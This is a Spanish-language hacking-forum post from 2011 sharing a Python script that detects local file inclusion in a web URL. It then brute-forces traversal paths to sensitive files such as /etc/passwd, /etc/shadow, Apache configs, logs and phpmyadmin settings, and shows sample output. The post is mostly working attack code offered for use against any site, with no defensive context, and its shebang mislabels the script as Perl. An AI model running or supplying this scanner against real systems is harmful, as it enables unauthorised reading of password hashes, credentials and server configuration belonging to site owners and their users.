elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Python] LFI T00l
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Python] LFI T00l  (Leído 1,702 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Python] LFI T00l
« en: 7 Octubre 2011, 01:38 am »

Hola a todos.

Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina
es vulnerable entonces el script automaticamente intenta brutear archivos.

Código
  1. #!usr/bin/perl
  2. #LFI T00l (C) Doddy Hackman
  3.  
  4. import os,sys,urllib2,re
  5.  
  6. files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  7.  
  8. def header() :
  9. print "\n--== LFI T00l ==--\n"
  10.  
  11. def copyright() :
  12. print "\n\n(C) Doddy Hackman 2010\n"
  13. exit(1)
  14.  
  15. def show() :
  16. print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  17.  
  18. def toma(web) :
  19. return urllib2.urlopen(web).read()
  20.  
  21.  
  22. def fuzz(web):
  23. print "\n[+] Fuzzing files...\n"
  24. for file in files:
  25.  code = toma(web+file)
  26.  if not (re.findall("No such file or directory in",code)):
  27.   print "[File Found] : ",web,file
  28.  
  29.  
  30.  
  31. def test(web):
  32. try:
  33.  print "\n[+] Testing vulnerability LFI in",web
  34.  code = toma(web+"'")
  35.  if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
  36.   fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
  37.   print "\n[+] LFI Detected"
  38.   print "[+] Full Path discloure : ",fpd[0]
  39.   fuzz(web)
  40.  else:
  41.   print "[-] LFI Not Found"
  42. except:
  43.  pass
  44.  
  45. header()
  46.  
  47. if len(sys.argv) != 2 :
  48. show()
  49.  
  50. else :
  51. test(sys.argv[1])
  52.  
  53. copyright()
  54.  
  55.  
  56. #The End
  57.  
Ejemplo de uso

Código:
python lfi.py http://127.0.0.1/lfi.php?file=

Código:
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010



« Última modificación: 8 Octubre 2011, 19:07 pm por Doddy » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
(Python)Existen ventanas de entrada y salida de datos en python « 1 2 »
Scripting
tonilogar 11 16,207 Último mensaje 29 Noviembre 2009, 00:49 am
por tonilogar
[python]VideoTraining Aprende A Programar En Python desde 0 « 1 2 3 »
Scripting
juh 22 18,383 Último mensaje 16 Octubre 2010, 13:12 pm
por Pere Navarro
[Perl] CSRF T00l
Scripting
BigBear 0 1,882 Último mensaje 7 Octubre 2011, 01:16 am
por BigBear
[Ruby] LFI T00l
Scripting
BigBear 0 2,923 Último mensaje 7 Octubre 2011, 01:30 am
por BigBear
[Perl] MSSQL T00l
Scripting
BigBear 0 1,619 Último mensaje 9 Octubre 2011, 17:47 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines